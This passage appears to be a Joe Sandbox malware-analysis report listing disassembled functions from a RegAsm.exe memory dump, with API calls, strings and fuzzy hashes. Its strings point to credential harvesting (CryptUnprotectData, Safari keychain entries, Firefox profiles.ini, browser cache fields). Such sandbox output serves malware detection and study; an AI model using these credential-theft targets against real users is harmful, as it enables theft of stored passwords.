                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                          • String ID: OsError 0x%x (%u)
                                                          • API String ID: 403622227-2664311388
                                                          • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                          • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Version
                                                          • String ID:
                                                          • API String ID: 1889659487-0
                                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                          APIs
                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                          • memset.MSVCRT ref: 0040265F
                                                          • memcpy.MSVCRT ref: 0040269B
                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                          • memcpy.MSVCRT ref: 004026FF
                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                          • API String ID: 2257402768-1134094380
                                                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                          • String ID: :stringdata$ftp://$http://$https://
                                                          • API String ID: 2787044678-1921111777
                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                          • GetDC.USER32 ref: 004140E3
                                                          • wcslen.MSVCRT ref: 00414123
                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                          • _snwprintf.MSVCRT ref: 00414244
                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                          • String ID: %s:$EDIT$STATIC
                                                          • API String ID: 2080319088-3046471546
                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                          • memset.MSVCRT ref: 00413292
                                                          • memset.MSVCRT ref: 004132B4
                                                          • memset.MSVCRT ref: 004132CD
                                                          • memset.MSVCRT ref: 004132E1
                                                          • memset.MSVCRT ref: 004132FB
                                                          • memset.MSVCRT ref: 00413310
                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                          • memset.MSVCRT ref: 004133C0
                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                          • memcpy.MSVCRT ref: 004133FC
                                                          • wcscpy.MSVCRT ref: 0041341F
                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                          Strings
                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                          • {Unknown}, xrefs: 004132A6
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                          • API String ID: 4111938811-1819279800
                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                          • SetCursor.USER32(00000000), ref: 0040129E
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                          • String ID:
                                                          • API String ID: 829165378-0
                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                          APIs
                                                          • memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          • wcscpy.MSVCRT ref: 004041D6
                                                          • wcscpy.MSVCRT ref: 004041E7
                                                          • memset.MSVCRT ref: 00404200
                                                          • memset.MSVCRT ref: 00404215
                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                          • wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 0040426E
                                                          • memset.MSVCRT ref: 004042CD
                                                          • memset.MSVCRT ref: 004042E2
                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                          • wcscpy.MSVCRT ref: 00404311
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                          • API String ID: 2454223109-1580313836
                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                          APIs
                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                          • memcpy.MSVCRT ref: 004115C8
                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                          • API String ID: 4054529287-3175352466
                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintf$memset$wcscpy
                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                          • API String ID: 2000436516-3842416460
                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                          APIs
                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                          • String ID:
                                                          • API String ID: 1043902810-0
                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                          APIs
                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                          • memset.MSVCRT ref: 0040E380
                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                          • memcpy.MSVCRT ref: 0040E3EC
                                                          • memcpy.MSVCRT ref: 0040E407
                                                          • memcpy.MSVCRT ref: 0040E422
                                                          • memcpy.MSVCRT ref: 0040E43D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                          • API String ID: 3073804840-2252543386
                                                          • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                          • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                          • API String ID: 2899246560-1542517562
                                                          • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                          • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                          • String ID:
                                                          • API String ID: 3715365532-3916222277
                                                          • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                          • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                          • memset.MSVCRT ref: 004085CF
                                                          • memset.MSVCRT ref: 004085F1
                                                          • memset.MSVCRT ref: 00408606
                                                          • strcmp.MSVCRT ref: 00408645
                                                          • _mbscpy.MSVCRT ref: 004086DB
                                                          • _mbscpy.MSVCRT ref: 004086FA
                                                          • memset.MSVCRT ref: 0040870E
                                                          • strcmp.MSVCRT ref: 0040876B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                          • CloseHandle.KERNEL32(?), ref: 004087A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                          • String ID: ---
                                                          • API String ID: 3437578500-2854292027
                                                          • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                          • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                          APIs
                                                          • memset.MSVCRT ref: 0041087D
                                                          • memset.MSVCRT ref: 00410892
                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                          Memory Dump Source
